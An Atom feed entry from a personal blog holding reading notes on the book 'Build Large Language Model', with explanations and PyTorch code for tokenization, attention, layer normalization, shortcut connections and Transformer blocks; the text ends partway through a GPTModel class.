<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://crabin.github.io/feed.xml" rel="self" type="application/atom+xml" /><link href="https://crabin.github.io/" rel="alternate" type="text/html" /><updated>2026-03-27T10:06:00+00:00</updated><id>https://crabin.github.io/feed.xml</id><title type="html">LI’s personal homepage</title><subtitle>Welcome to my personal homepage</subtitle><author><name>LI PENGBIN</name><email>cralpbin@gmail.com</email></author><entry><title type="html">Build Large Language Model</title><link href="https://crabin.github.io/posts/2025/3/Build%20Large%20Language%20Model/" rel="alternate" type="text/html" title="Build Large Language Model" /><published>2025-03-13T00:00:00+00:00</published><updated>2025-03-13T00:00:00+00:00</updated><id>https://crabin.github.io/posts/2025/3/Build%20Large%20Language%20Model</id><content type="html" xml:base="https://crabin.github.io/posts/2025/3/Build%20Large%20Language%20Model/"><![CDATA[<h1 id="阅读图书build-large-language-model">Reading Notes: Build Large Language Model</h1>

<p><a href="https://moored-dumpling-e31.notion.site/Build-Large-Language-Model-196f92fc811b80e08946e8938d1bc28e">View the published Notion version of these notes</a></p>

<p>Date: February 9, 2025 → February 28, 2025
Status: In progress</p>

<p>AI security</p>

<p>Attention mechanisms</p>

<p><a href="https://blog.csdn.net/weixin_42110638/article/details/134011134">https://blog.csdn.net/weixin_42110638/article/details/134011134</a></p>

<p>An in-depth look at attention mechanisms</p>

<p><a href="https://mp.weixin.qq.com/s/Qlf33S3UkxO8Kui1XfH_Fg">https://mp.weixin.qq.com/s/Qlf33S3UkxO8Kui1XfH_Fg</a></p>

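<p>Distillation trains a small model with the help of a large one. When the large model teaches the small model, it provides the correct label and also assigns tiny probabilities to the other possibilities. For example, when recognizing an image of a handwritten 2, it says the digit is a 2 while also giving a probability of 0.00001 that it is a 3 and 0.00000001 that it is a 7. Even if the small model has never seen a 3 or a 7, it may still learn to recognize them. This improves generalization, and a small model trained by a large model reaches better accuracy than a small model trained on its own.</p>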
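
<p>The soft-target idea above can be sketched in a few lines of plain Python. This is a minimal sketch, assuming a temperature-scaled softmax and a KL-divergence loss; the logits, the temperature value, and the function names are made up for illustration and do not come from the book.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import math

def softmax(logits, temperature=1.0):
    """Convert logits to probabilities; a higher temperature gives softer targets."""
    scaled = [z / temperature for z in logits]
    peak = max(scaled)  # subtract the max for numerical stability
    exps = [math.exp(z - peak) for z in scaled]
    total = sum(exps)
    return [e / total for e in exps]

def distillation_loss(student_logits, teacher_logits, temperature=2.0):
    """KL divergence between the teacher's soft targets and the student's predictions."""
    teacher = softmax(teacher_logits, temperature)
    student = softmax(student_logits, temperature)
    return sum(t * math.log(t / s) for t, s in zip(teacher, student))

# Hypothetical logits for the classes [2, 3, 7] on an image of a handwritten 2
teacher_logits = [9.0, 2.0, 0.5]
soft_targets = softmax(teacher_logits, temperature=2.0)
print("soft targets:", [round(p, 4) for p in soft_targets])

matching_student = [9.0, 2.0, 0.5]         # reproduces the teacher's distribution
overconfident_student = [9.0, -5.0, -5.0]  # ignores the small probabilities
loss_matching = distillation_loss(matching_student, teacher_logits)
loss_overconfident = distillation_loss(overconfident_student, teacher_logits)
print("loss (matching):", loss_matching)
print("loss (overconfident):", loss_overconfident)
</code></pre></div></div>

<p>The loss is zero when the student reproduces the teacher's distribution and grows when the student ignores the small probabilities that the teacher assigns to 3 and 7.</p>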

<p>Idea: study how this direction could be applied to IDS. Worth trying as a research topic.</p>

<h1 id="开始">Getting Started</h1>

<p><img src="阅读图书Build Large Language Model\image.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<h1 id="第2章-working-with-text-data">Chapter 2: Working with Text Data</h1>

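<p>This chapter walks through how text data is converted into token IDs and explains the principles behind it. In practice, the tokenizer can be used directly:</p>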

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">tiktoken</span> 
 
<span class="n">tokenizer</span> <span class="o">=</span> <span class="n">tiktoken</span><span class="p">.</span><span class="n">get_encoding</span><span class="p">(</span><span class="s">"gpt2"</span><span class="p">)</span>
</code></pre></div></div>
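
<p>tiktoken hides the details, so the following toy word-level tokenizer may help show what "text to token IDs" means. It is a minimal sketch: the function names and the sample sentence are hypothetical, and it deliberately skips BPE and special tokens.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import re

def tokenize(text):
    """Split text into word and punctuation tokens, dropping whitespace."""
    pieces = re.split(r"([,.:;?!]|\s)", text)
    return [p.strip() for p in pieces if p.strip()]

def build_vocab(text):
    """Assign an integer ID to every unique token, in sorted order."""
    return {token: idx for idx, token in enumerate(sorted(set(tokenize(text))))}

def encode(text, vocab):
    """Convert text to a list of token IDs (raises KeyError on unseen tokens)."""
    return [vocab[token] for token in tokenize(text)]

def decode(ids, vocab):
    """Convert token IDs back to a space-joined string."""
    id_to_token = {idx: token for token, idx in vocab.items()}
    return " ".join(id_to_token[i] for i in ids)

corpus = "the cat sat on the mat."
vocab = build_vocab(corpus)
ids = encode("the mat sat.", vocab)
print(ids)
print(decode(ids, vocab))
</code></pre></div></div>

<p>Because this vocabulary only contains words seen in the corpus, any new word raises a <code class="language-plaintext highlighter-rouge">KeyError</code>. That limitation is what an unknown-word token or a subword scheme such as BPE is meant to address.</p>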

<ol>
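  <li><strong>Converting text to numeric vectors</strong>: LLMs cannot process raw text directly, so the text has to be converted into numeric vectors (embeddings). Embeddings map discrete data (such as words or images) into a continuous vector space that neural networks can operate on.</li>
  <li><strong>Tokenization</strong>: Raw text is first split into tokens, which can be words or characters. The tokens are then converted into integer representations called token IDs.</li>
  <li><strong>Special tokens</strong>: Special tokens can be added to help the model handle different contexts, for example <code class="language-plaintext highlighter-rouge">&lt;|unk|&gt;</code> for unknown words and <code class="language-plaintext highlighter-rouge">&lt;|endoftext|&gt;</code> to mark the end of a text.</li>
  <li><strong>Byte pair encoding (BPE)</strong>: Models such as GPT-2 and GPT-3 use a BPE tokenizer, which handles unknown words efficiently by breaking them down into subword units or individual characters.</li>
  <li><strong>Sliding window</strong>: When training LLMs, a sliding window is moved over the tokenized data to generate input-target pairs.</li>
  <li><strong>Embedding layer</strong>: In PyTorch, an embedding layer is a lookup operation that retrieves the vector corresponding to each token ID. The resulting continuous token representations are essential for training deep learning models.</li>
  <li><strong>Positional embeddings</strong>: There are two main ways to encode a token's position in the sequence: absolute and relative positional embeddings. OpenAI's GPT models use absolute positional embeddings, which are added to the token embedding vectors and optimized during training.</li>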
</ol>
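
<p>The sliding-window step (item 5) can be sketched as follows. This is a minimal sketch in plain Python; the function name, the token IDs, and the <code class="language-plaintext highlighter-rouge">max_length</code> and <code class="language-plaintext highlighter-rouge">stride</code> values are hypothetical. Each target is simply the input shifted one position to the right, so the model learns to predict the next token at every position.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>def sliding_window_pairs(token_ids, max_length, stride):
    """Return (input, target) chunks where each target is the input shifted by one."""
    pairs = []
    for start in range(0, len(token_ids) - max_length, stride):
        inputs = token_ids[start:start + max_length]
        targets = token_ids[start + 1:start + max_length + 1]
        pairs.append((inputs, targets))
    return pairs

token_ids = [40, 367, 2885, 1464, 1807, 3619, 402, 271]  # hypothetical token IDs
pairs = sliding_window_pairs(token_ids, max_length=4, stride=2)
for inputs, targets in pairs:
    print("input:", inputs, "target:", targets)
</code></pre></div></div>

<p>A stride smaller than <code class="language-plaintext highlighter-rouge">max_length</code> makes consecutive chunks overlap; a stride equal to <code class="language-plaintext highlighter-rouge">max_length</code> uses every token as an input exactly once.</p>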

<h1 id="第3章-coding-attention-mechanisms">Chapter 3: Coding Attention Mechanisms</h1>

<p>This chapter introduces attention mechanisms and how they are used in large language models (LLMs).</p>

<p><img src="阅读图书Build Large Language Model\image 1.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<ol>
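  <li><strong>What attention does</strong>: An attention mechanism transforms input elements into enhanced context vector representations that incorporate information from all inputs.</li>
  <li><strong>Self-attention</strong>: Self-attention produces each context vector as a weighted sum of the input elements. In the simplified attention mechanism, the attention weights are computed with dot products.</li>
  <li><strong>Dot products and matrix multiplication</strong>: A dot product multiplies two vectors element by element and sums the results. Matrix multiplication replaces nested loops, making the computation more compact and efficient.</li>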
  <li>
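    <p><strong>Scaled dot-product attention</strong>: The self-attention mechanism used in LLMs (called scaled dot-product attention) introduces trainable weight matrices that compute intermediate transformations of the input: queries, values, and keys.</p>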

    <p><img src="阅读图书Build Large Language Model\image%202.png" alt="阅读图书Build Large Language Model\image.png" /></p>

    <p><img src="阅读图书Build Large Language Model\image%203.png" alt="阅读图书Build Large Language Model\image.png" /></p>
  </li>
  <li>
    <p><strong>Causal attention mask</strong>: In LLMs that generate text from left to right, a causal attention mask prevents the model from accessing future tokens.</p>

    <p><img src="阅读图书Build Large Language Model\image%204.png" alt="阅读图书Build Large Language Model\image.png" /></p>

    <p><img src="阅读图书Build Large Language Model\image%205.png" alt="阅读图书Build Large Language Model\image.png" /></p>
  </li>
  <li>
    <p><strong>Dropout mask</strong>: In addition to the causal attention mask, a dropout mask can be applied to reduce overfitting in LLMs.</p>

    <p><img src="阅读图书Build Large Language Model\image%206.png" alt="阅读图书Build Large Language Model\image.png" /></p>

    <p><img src="阅读图书Build Large Language Model\image%207.png" alt="阅读图书Build Large Language Model\image.png" /></p>
  </li>
  <li>
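    <p><strong>Multi-head attention</strong>: Transformer-based LLMs use multi-head attention, which stacks multiple causal attention modules, one per head. The multi-head attention module can be implemented more efficiently with batched matrix multiplication.</p>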

    <p><img src="阅读图书Build Large Language Model\image%208.png" alt="阅读图书Build Large Language Model\image.png" /></p>
  </li>
</ol>
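
<p>Items 4 and 5 above can be combined into a small sketch of causal scaled dot-product attention for a single head. It uses plain Python lists rather than PyTorch tensors so that it runs without dependencies. The input values, weight matrices, and function names are hypothetical; in a real model the matrices would be trained parameters.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import math

def softmax(row):
    """Turn a list of scores into weights that sum to 1."""
    peak = max(row)
    exps = [math.exp(v - peak) for v in row]
    total = sum(exps)
    return [e / total for e in exps]

def matmul(a, b):
    """Multiply two matrices given as lists of rows."""
    return [[sum(x * y for x, y in zip(row, col)) for col in zip(*b)] for row in a]

def causal_attention(x, w_q, w_k, w_v):
    """Return (context_vectors, attention_weights) for one attention head."""
    queries, keys, values = matmul(x, w_q), matmul(x, w_k), matmul(x, w_v)
    n, d_k = len(x), len(keys[0])
    weights = []
    for i in range(n):
        # Scaled dot product between query i and every key
        scores = [sum(q * k for q, k in zip(queries[i], keys[j])) / math.sqrt(d_k)
                  for j in range(n)]
        # Causal mask: future positions (j after i) get -inf, so softmax gives them 0
        for j in range(i + 1, n):
            scores[j] = -math.inf
        weights.append(softmax(scores))
    return matmul(weights, values), weights

# Three tokens with 2-dimensional embeddings (hypothetical values)
x = [[0.4, 0.1], [0.5, 0.9], [0.2, 0.7]]
w_q = [[1.0, 0.0], [0.0, 1.0]]
w_k = [[0.5, 0.2], [0.1, 0.8]]
w_v = [[1.0, 0.3], [0.2, 1.0]]

context, weights = causal_attention(x, w_q, w_k, w_v)
for row in weights:
    print([round(w, 3) for w in row])
</code></pre></div></div>

<p>The printed weight matrix is lower triangular: the first token can only attend to itself, while the last token attends to all three positions. Dropout and multiple heads are left out to keep the sketch short.</p>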

<h1 id="第4章implementing-a-gpt-model-from--scratch-to-generate-text">Chapter 4: Implementing a GPT Model from Scratch to Generate Text</h1>

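<p>This chapter explains the core components of the GPT model (layer normalization, shortcut connections, and Transformer blocks), the model sizes, and the basic principle of text generation. It also stresses how much the quality of the output depends on training.</p>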

<p><img src="阅读图书Build Large Language Model\image%209.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<p><img src="阅读图书Build Large Language Model\image%2010.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<p><img src="阅读图书Build Large Language Model\image%2011.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<p><img src="阅读图书Build Large Language Model\image%2012.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<ol>
  <li>
    <p><strong>Layer normalization</strong>: Layer normalization stabilizes training by ensuring that the outputs of each layer have a consistent mean and variance.</p>

    <p><img src="阅读图书Build Large Language Model\image%2013.png" alt="阅读图书Build Large Language Model\image.png" /></p>

    <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">class</span> <span class="nc">LayerNorm</span><span class="p">(</span><span class="n">nn</span><span class="p">.</span><span class="n">Module</span><span class="p">):</span>
     <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">emb_dim</span><span class="p">):</span>
         <span class="nb">super</span><span class="p">().</span><span class="n">__init__</span><span class="p">()</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">eps</span> <span class="o">=</span> <span class="mf">1e-5</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">scale</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Parameter</span><span class="p">(</span><span class="n">torch</span><span class="p">.</span><span class="n">ones</span><span class="p">(</span><span class="n">emb_dim</span><span class="p">))</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">shift</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Parameter</span><span class="p">(</span><span class="n">torch</span><span class="p">.</span><span class="n">zeros</span><span class="p">(</span><span class="n">emb_dim</span><span class="p">))</span>
    
     <span class="k">def</span> <span class="nf">forward</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">x</span><span class="p">):</span>
         <span class="n">mean</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">mean</span><span class="p">(</span><span class="n">dim</span><span class="o">=-</span><span class="mi">1</span><span class="p">,</span> <span class="n">keepdim</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
         <span class="n">var</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">var</span><span class="p">(</span><span class="n">dim</span><span class="o">=-</span><span class="mi">1</span><span class="p">,</span> <span class="n">keepdim</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">unbiased</span><span class="o">=</span><span class="bp">False</span><span class="p">)</span>
         <span class="n">norm_x</span> <span class="o">=</span> <span class="p">(</span><span class="n">x</span> <span class="o">-</span> <span class="n">mean</span><span class="p">)</span> <span class="o">/</span> <span class="n">torch</span><span class="p">.</span><span class="n">sqrt</span><span class="p">(</span><span class="n">var</span> <span class="o">+</span> <span class="bp">self</span><span class="p">.</span><span class="n">eps</span><span class="p">)</span>
         <span class="k">return</span> <span class="bp">self</span><span class="p">.</span><span class="n">scale</span> <span class="o">*</span> <span class="n">norm_x</span> <span class="o">+</span> <span class="bp">self</span><span class="p">.</span><span class="n">shift</span>
</code></pre></div>    </div>
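
    <p>To see what the normalization step does numerically, here is a minimal sketch in plain Python. The activation values are hypothetical, and the trainable <code class="language-plaintext highlighter-rouge">scale</code> and <code class="language-plaintext highlighter-rouge">shift</code> parameters are left out, which matches their initial values of 1 and 0 in the class above.</p>

    <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import math

def layer_norm(values, eps=1e-5):
    """Normalize a list of activations to zero mean and (nearly) unit variance."""
    mean = sum(values) / len(values)
    # Biased variance (divide by n), like unbiased=False in the class above
    var = sum((v - mean) ** 2 for v in values) / len(values)
    return [(v - mean) / math.sqrt(var + eps) for v in values]

activations = [0.2, 1.5, -0.7, 3.0, 0.0]  # hypothetical layer outputs
normalized = layer_norm(activations)

new_mean = sum(normalized) / len(normalized)
new_var = sum((v - new_mean) ** 2 for v in normalized) / len(normalized)
print("mean:", round(new_mean, 6), "variance:", round(new_var, 4))
</code></pre></div>    </div>

    <p>The variance ends up very slightly below 1 because <code class="language-plaintext highlighter-rouge">eps</code> is added inside the square root to avoid division by zero.</p>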
  </li>
  <li>
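    <p><strong>Feed-forward network</strong></p>

    <p>The feed-forward network uses GELU rather than ReLU activations. GELU is smooth and keeps a small non-zero gradient for negative inputs, which helps gradients keep flowing where ReLU would output exactly zero.</p>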

    <p><img src="阅读图书Build Large Language Model\image%2014.png" alt="阅读图书Build Large Language Model\image.png" /></p>

    <p><img src="阅读图书Build Large Language Model\image%2015.png" alt="阅读图书Build Large Language Model\image.png" /></p>
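
    <p>The difference between the two activations can be checked on a few sample inputs. This is a minimal sketch, assuming the tanh approximation of GELU that GPT-2 uses; the notes above do not show the implementation, so the formula and the sample inputs are assumptions.</p>

    <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import math

def relu(x):
    """ReLU: zero for every negative input."""
    return max(0.0, x)

def gelu(x):
    """Tanh approximation of GELU (assumed variant, as used in GPT-2)."""
    inner = math.sqrt(2.0 / math.pi) * (x + 0.044715 * x ** 3)
    return 0.5 * x * (1.0 + math.tanh(inner))

for x in [-2.0, -0.5, 0.0, 0.5, 2.0]:
    print(x, relu(x), round(gelu(x), 4))
</code></pre></div>    </div>

    <p>For negative inputs ReLU returns exactly zero, whereas GELU returns a small negative value, so those units can still contribute to learning.</p>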
  </li>
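  <li><strong>Shortcut connections</strong>: A shortcut connection passes the output of one layer directly to a deeper layer, skipping one or more layers in between. This mitigates the vanishing gradient problem when training deep neural networks such as LLMs.
    <ul>
      <li>In a deep network, gradients are propagated backward layer by layer. If the gradient is small at each layer, it can become extremely small after many layers and may approach zero (vanishing gradients).</li>
      <li>By skipping some layers, a shortcut connection gives the gradient a <strong>direct propagation path</strong>, so it reaches the shallow layers more effectively instead of decaying across many layers.</li>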
    </ul>

    <p><img src="阅读图书Build Large Language Model\image%2016.png" alt="阅读图书Build Large Language Model\image.png" /></p>

    <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">class</span> <span class="nc">ExampleDeepNeuralNetwork</span><span class="p">(</span><span class="n">nn</span><span class="p">.</span><span class="n">Module</span><span class="p">):</span>
     <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">layer_sizes</span><span class="p">,</span> <span class="n">use_shortcut</span><span class="p">):</span>
         <span class="nb">super</span><span class="p">().</span><span class="n">__init__</span><span class="p">()</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">use_shortcut</span> <span class="o">=</span> <span class="n">use_shortcut</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">layers</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">ModuleList</span><span class="p">([</span>
             <span class="n">nn</span><span class="p">.</span><span class="n">Sequential</span><span class="p">(</span><span class="n">nn</span><span class="p">.</span><span class="n">Linear</span><span class="p">(</span><span class="n">layer_sizes</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">layer_sizes</span><span class="p">[</span><span class="mi">1</span><span class="p">]),</span> <span class="n">GELU</span><span class="p">()),</span>
             <span class="n">nn</span><span class="p">.</span><span class="n">Sequential</span><span class="p">(</span><span class="n">nn</span><span class="p">.</span><span class="n">Linear</span><span class="p">(</span><span class="n">layer_sizes</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">layer_sizes</span><span class="p">[</span><span class="mi">2</span><span class="p">]),</span> <span class="n">GELU</span><span class="p">()),</span>
             <span class="n">nn</span><span class="p">.</span><span class="n">Sequential</span><span class="p">(</span><span class="n">nn</span><span class="p">.</span><span class="n">Linear</span><span class="p">(</span><span class="n">layer_sizes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="n">layer_sizes</span><span class="p">[</span><span class="mi">3</span><span class="p">]),</span> <span class="n">GELU</span><span class="p">()),</span>
             <span class="n">nn</span><span class="p">.</span><span class="n">Sequential</span><span class="p">(</span><span class="n">nn</span><span class="p">.</span><span class="n">Linear</span><span class="p">(</span><span class="n">layer_sizes</span><span class="p">[</span><span class="mi">3</span><span class="p">],</span> <span class="n">layer_sizes</span><span class="p">[</span><span class="mi">4</span><span class="p">]),</span> <span class="n">GELU</span><span class="p">()),</span>
             <span class="n">nn</span><span class="p">.</span><span class="n">Sequential</span><span class="p">(</span><span class="n">nn</span><span class="p">.</span><span class="n">Linear</span><span class="p">(</span><span class="n">layer_sizes</span><span class="p">[</span><span class="mi">4</span><span class="p">],</span> <span class="n">layer_sizes</span><span class="p">[</span><span class="mi">5</span><span class="p">]),</span> <span class="n">GELU</span><span class="p">())</span>
         <span class="p">])</span>
    
     <span class="k">def</span> <span class="nf">forward</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">x</span><span class="p">):</span>
         <span class="k">for</span> <span class="n">layer</span> <span class="ow">in</span> <span class="bp">self</span><span class="p">.</span><span class="n">layers</span><span class="p">:</span>
             <span class="c1"># Compute the output of the current layer
</span>             <span class="n">layer_output</span> <span class="o">=</span> <span class="n">layer</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
             <span class="c1"># Check if shortcut can be applied
</span>             <span class="k">if</span> <span class="bp">self</span><span class="p">.</span><span class="n">use_shortcut</span> <span class="ow">and</span> <span class="n">x</span><span class="p">.</span><span class="n">shape</span> <span class="o">==</span> <span class="n">layer_output</span><span class="p">.</span><span class="n">shape</span><span class="p">:</span>
                 <span class="n">x</span> <span class="o">=</span> <span class="n">x</span> <span class="o">+</span> <span class="n">layer_output</span>
             <span class="k">else</span><span class="p">:</span>
                 <span class="n">x</span> <span class="o">=</span> <span class="n">layer_output</span>
         <span class="k">return</span> <span class="n">x</span>
    
 <span class="k">def</span> <span class="nf">print_gradients</span><span class="p">(</span><span class="n">model</span><span class="p">,</span> <span class="n">x</span><span class="p">):</span>
     <span class="c1"># Forward pass
</span>     <span class="n">output</span> <span class="o">=</span> <span class="n">model</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
     <span class="n">target</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">tensor</span><span class="p">([[</span><span class="mf">0.</span><span class="p">]])</span>
    
     <span class="c1"># Calculate loss based on how close the target
</span>     <span class="c1"># and output are
</span>     <span class="n">loss</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">MSELoss</span><span class="p">()</span>
     <span class="n">loss</span> <span class="o">=</span> <span class="n">loss</span><span class="p">(</span><span class="n">output</span><span class="p">,</span> <span class="n">target</span><span class="p">)</span>
        
     <span class="c1"># Backward pass to calculate the gradients
</span>     <span class="n">loss</span><span class="p">.</span><span class="n">backward</span><span class="p">()</span>
    
     <span class="k">for</span> <span class="n">name</span><span class="p">,</span> <span class="n">param</span> <span class="ow">in</span> <span class="n">model</span><span class="p">.</span><span class="n">named_parameters</span><span class="p">():</span>
         <span class="k">if</span> <span class="s">'weight'</span> <span class="ow">in</span> <span class="n">name</span><span class="p">:</span>
             <span class="c1"># Print the mean absolute gradient of the weights
</span>             <span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">"</span><span class="si">{</span><span class="n">name</span><span class="si">}</span><span class="s"> has gradient mean of </span><span class="si">{</span><span class="n">param</span><span class="p">.</span><span class="n">grad</span><span class="p">.</span><span class="nb">abs</span><span class="p">().</span><span class="n">mean</span><span class="p">().</span><span class="n">item</span><span class="p">()</span><span class="si">}</span><span class="s">"</span><span class="p">)</span>
</code></pre></div>    </div>
  </li>
  <li>
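    <p><strong>Transformer block</strong>: The Transformer block is the core structural component of the GPT model. It combines a masked multi-head attention module with a fully connected feed-forward network that uses the GELU activation function.</p>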

    <p><img src="阅读图书Build Large Language Model\image%2017.png" alt="阅读图书Build Large Language Model\image.png" /></p>

    <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    
 <span class="k">class</span> <span class="nc">TransformerBlock</span><span class="p">(</span><span class="n">nn</span><span class="p">.</span><span class="n">Module</span><span class="p">):</span>
     <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">cfg</span><span class="p">):</span>
         <span class="nb">super</span><span class="p">().</span><span class="n">__init__</span><span class="p">()</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">att</span> <span class="o">=</span> <span class="n">MultiHeadAttention</span><span class="p">(</span>
             <span class="n">d_in</span><span class="o">=</span><span class="n">cfg</span><span class="p">[</span><span class="s">"emb_dim"</span><span class="p">],</span>
             <span class="n">d_out</span><span class="o">=</span><span class="n">cfg</span><span class="p">[</span><span class="s">"emb_dim"</span><span class="p">],</span>
             <span class="n">context_length</span><span class="o">=</span><span class="n">cfg</span><span class="p">[</span><span class="s">"context_length"</span><span class="p">],</span>
             <span class="n">num_heads</span><span class="o">=</span><span class="n">cfg</span><span class="p">[</span><span class="s">"n_heads"</span><span class="p">],</span> 
             <span class="n">dropout</span><span class="o">=</span><span class="n">cfg</span><span class="p">[</span><span class="s">"drop_rate"</span><span class="p">],</span>
             <span class="n">qkv_bias</span><span class="o">=</span><span class="n">cfg</span><span class="p">[</span><span class="s">"qkv_bias"</span><span class="p">])</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">ff</span> <span class="o">=</span> <span class="n">FeedForward</span><span class="p">(</span><span class="n">cfg</span><span class="p">)</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">norm1</span> <span class="o">=</span> <span class="n">LayerNorm</span><span class="p">(</span><span class="n">cfg</span><span class="p">[</span><span class="s">"emb_dim"</span><span class="p">])</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">norm2</span> <span class="o">=</span> <span class="n">LayerNorm</span><span class="p">(</span><span class="n">cfg</span><span class="p">[</span><span class="s">"emb_dim"</span><span class="p">])</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">drop_shortcut</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Dropout</span><span class="p">(</span><span class="n">cfg</span><span class="p">[</span><span class="s">"drop_rate"</span><span class="p">])</span>
    
     <span class="k">def</span> <span class="nf">forward</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">x</span><span class="p">):</span>
         <span class="c1"># Shortcut connection for attention block
</span>         <span class="n">shortcut</span> <span class="o">=</span> <span class="n">x</span>
         <span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">norm1</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
         <span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">att</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>  <span class="c1"># Shape [batch_size, num_tokens, emb_size]
</span>         <span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">drop_shortcut</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
         <span class="n">x</span> <span class="o">=</span> <span class="n">x</span> <span class="o">+</span> <span class="n">shortcut</span>  <span class="c1"># Add the original input back
</span>    
         <span class="c1"># Shortcut connection for feed forward block
</span>         <span class="n">shortcut</span> <span class="o">=</span> <span class="n">x</span>
         <span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">norm2</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
         <span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">ff</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
         <span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">drop_shortcut</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
         <span class="n">x</span> <span class="o">=</span> <span class="n">x</span> <span class="o">+</span> <span class="n">shortcut</span>  <span class="c1"># Add the original input back
</span>    
         <span class="k">return</span> <span class="n">x</span>
</code></pre></div>    </div>
  </li>
  <li>
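    <p><strong>GPT model</strong>: A GPT model is a large language model (LLM) built from many repeated Transformer blocks, with parameter counts ranging from millions to billions. GPT models of different sizes (for example 124 million, 345 million, 762 million, and 1,542 million parameters) can all be implemented with the same Python class (such as <code class="language-plaintext highlighter-rouge">GPTModel</code>).</p>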

    <p><img src="阅读图书Build Large Language Model\image%2018.png" alt="阅读图书Build Large Language Model\image.png" /></p>

    <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">class</span> <span class="nc">GPTModel</span><span class="p">(</span><span class="n">nn</span><span class="p">.</span><span class="n">Module</span><span class="p">):</span>
     <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">cfg</span><span class="p">):</span>
         <span class="nb">super</span><span class="p">().</span><span class="n">__init__</span><span class="p">()</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">tok_emb</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Embedding</span><span class="p">(</span><span class="n">cfg</span><span class="p">[</span><span class="s">"vocab_size"</span><span class="p">],</span> <span class="n">cfg</span><span class="p">[</span><span class="s">"emb_dim"</span><span class="p">])</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">pos_emb</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Embedding</span><span class="p">(</span><span class="n">cfg</span><span class="p">[</span><span class="s">"context_length"</span><span class="p">],</span> <span class="n">cfg</span><span class="p">[</span><span class="s">"emb_dim"</span><span class="p">])</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">drop_emb</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Dropout</span><span class="p">(</span><span class="n">cfg</span><span class="p">[</span><span class="s">"drop_rate"</span><span class="p">])</span>
            
         <span class="bp">self</span><span class="p">.</span><span class="n">trf_blocks</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Sequential</span><span class="p">(</span>
